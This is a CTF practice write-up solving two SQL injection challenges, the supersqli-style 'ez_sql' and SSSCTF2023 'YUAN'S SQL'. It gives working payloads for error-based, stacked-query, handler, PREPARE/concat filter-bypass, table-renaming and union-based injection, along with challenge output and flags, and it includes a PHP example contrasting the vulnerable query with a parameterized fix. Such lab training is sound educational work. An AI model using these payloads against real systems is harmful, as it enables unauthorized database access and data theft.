2024/3/30 Practice problems on the main site

1. ez_sql

1. Test the injection type

The response to 2-1 differs from the response to 1, so the parameter is string-typed.

2. Determine the quoting style

1' produces an error message, which shows that the value is closed by a single quote.

3. Count the columns

group by gives 2 columns.

4. union select query

select is filtered, and the usual bypasses also fail, so switch to error-based injection.

http://210.30.97.133:28043/?inject=1'||extractvalue(1,concat('$',(database())))||'1'='1

error 1105 : Unknown XPATH variable at: '$supersqli'

Get the table names

Found that the `.` character is filtered, as is where; after some research it turns out that stacked queries are possible.

http://210.30.97.133:28043/?inject=1';show databases;#

array(1) {
[0]=>
string(11) "ctftraining"
}

array(1) {
[0]=>
string(18) "information_schema"
}

array(1) {
[0]=>
string(5) "mysql"
}

array(1) {
[0]=>
string(18) "performance_schema"
}

array(1) {
[0]=>
string(9) "supersqli"
}

array(1) {
[0]=>
string(4) "test"
}

http://210.30.97.133:28043/?inject=1';show tables;#

array(1) {
[0]=>
string(16) "1919810931114514"
}

array(1) {
[0]=>
string(5) "words"
}

select is filtered

http://210.30.97.133:28043/?inject=1';show columns from words;#   (no flag here)

http://210.30.97.133:28085/?inject=1';show columns from `1919810931114514`;#   (the numeric table name must be wrapped in backticks)

array(6) {
[0]=>
string(4) "flag"
[1]=>
string(12) "varchar(100)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}

?inject=1';select flag from flag;#   select gets filtered; I had no idea what to do at this point, so I went to read a writeup.

Method 1: the MySQL handler statement:

  1. handler [table name] open; // open a table
  2. handler [table name] read first || next; // read the first row, or the next row, of the table
  3. handler [table name] close; // close the table
handler `1919810931114514` open;
handler `1919810931114514` read first;
handler `1919810931114514` close;

Method 2:

  1. PREPARE [custom name] FROM [custom SQL statement]; // create
  2. EXECUTE [custom name]; // run
  3. DEALLOCATE PREPARE [custom name]; // release

Since select is filtered, build the statement with concat:
PREPARE Hack_SQL from concat('s','elect', ' * from `1919810931114514` ');
EXECUTE Hack_SQL;
DEALLOCATE PREPARE Hack_SQL;

Or with ASCII encoding:
PREPARE Hack_SQL from concat(char(115,101,108,101,99,116), ' * from `1919810931114514`');
EXECUTE Hack_SQL;
DEALLOCATE PREPARE Hack_SQL;#

Method 3

The front end queries the words table, but the flag is in the table 1919810931114514. The back-end SQL can be guessed to be: select * from words where id=[the id you enter]

1. So first rename the words table to some other name
2. Then rename table 1919810931114514 to words
3. And rename the flag column of the (former) 1919810931114514 table to id

payload:
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(100);

After the changes, entering ?inject=1' or 1=1; displays the flag:
array(1) {
[0]=>
string(42) "flag{590b74d2-2d4d-41f7-bb0e-137622e5043b}"
}

Reference: https://blog.csdn.net/weixin_44632787/article/details/118737571

SSSCTF2023-YUAN’S SQL

<?php
$sql = "SELECT * FROM jiuzhe WHERE id = ".'('.$_GET["id"].')';
$result = $conn->query($sql);

Hint: the injection point is wrapped in parentheses, (id)
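The vulnerable pattern from the snippet above next to a parameterized version, as an added example (not the challenge's source and not from the original writeup). It assumes a mysqli connection `$conn` and the `jiuzhe` table with the `id`, `username` and `password` columns seen in the output; the `blacklist_filter` function is a hypothetical stand-in for the kind of keyword filter ez_sql used.

```php
<?php
// Added example; assumes $conn is an open mysqli connection to the
// database holding table `jiuzhe` (id, username, password).

// Vulnerable pattern from the challenge: $_GET["id"] is spliced into the
// statement text. The "( ... )" wrapper only changes the shape of the
// payload (the writeup closes it with "3)"), it is not a defence.
function lookup_vulnerable(mysqli $conn, string $id): ?array {
    $sql = "SELECT * FROM jiuzhe WHERE id = " . '(' . $id . ')';
    $result = $conn->query($sql);
    return $result ? $result->fetch_all(MYSQLI_ASSOC) : null;
}

// Hypothetical keyword blacklist in the spirit of ez_sql (select, where and
// "." blocked). It is not a fix either: the writeup reaches the flag with
// show / handler / prepare / alter, none of which contain the blocked words.
function blacklist_filter(string $id): bool {
    return preg_match('/select|where|\./i', $id) === 0;
}

// Hardened version: the statement text is fixed, the value travels as a
// bound integer parameter, and a prepared statement executes exactly one
// statement, so stacked input such as "1'; show tables;#" can never run.
// Database errors are not echoed back, which also closes the extractvalue
// error-based channel used in ez_sql.
function lookup_safe(mysqli $conn, string $id): ?array {
    if (!ctype_digit($id)) {            // accept only a plain non-negative integer
        return null;
    }
    $stmt = $conn->prepare("SELECT id, username, password FROM jiuzhe WHERE id = ?");
    if ($stmt === false) {
        error_log($conn->error);        // log server-side, never show to the client
        return null;
    }
    $idInt = (int)$id;                  // bind_param needs a variable passed by reference
    $stmt->bind_param('i', $idInt);
    if (!$stmt->execute()) {
        error_log($stmt->error);
        return null;
    }
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Example use: $rows = lookup_safe($conn, $_GET['id'] ?? '');
```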

The comment sequence did not seem to work, so close the parenthesis manually.

?id=1) or (1=1   returns a fake flag:
Array ( [0] => Array ( [id] => 3 [username] => A306 [password] => where_is_flag ) [1] => Array ( [id] => 4 [username] => Fake_F1ag [password] => sssctf{f11lag_is_not_there_hahaha} ) )

Trying id=3 returns output, so test the injection point there.

?id=3)--+   Array ( [0] => Array ( [id] => 3 [username] => A306 [password] => where_is_flag ) )

?id=3) group by 4--+ gives no output while 3 does, so there are 3 columns.

?id=3) union select 1,2,database()--+   Array ( [id] => 1 [username] => 2 [password] => dutctf )

?id=3) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='dutctf'--+

Query the tables:

Array ( [id] => 1 [username] => 2 [password] => jiuzhe,users )

Query the columns:

?id=3) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='dutctf' and table_name='users'--+

Array ( [id] => 1 [username] => 2 [password] => id,username,password )

Query the data:

?id=3) union select 1,2,group_concat(username,password) from users--+

Array ( [id] => 1 [username] => 2 [password] => scr1wOHHHHHHH,Flagflag{c39ee9a1-5a6f-41c4-9789-909ab2d1ba1d} )

Coming back to reproduce the freshman contest challenge after learning all this feels very satisfying ╰( ̄▽ ̄)╭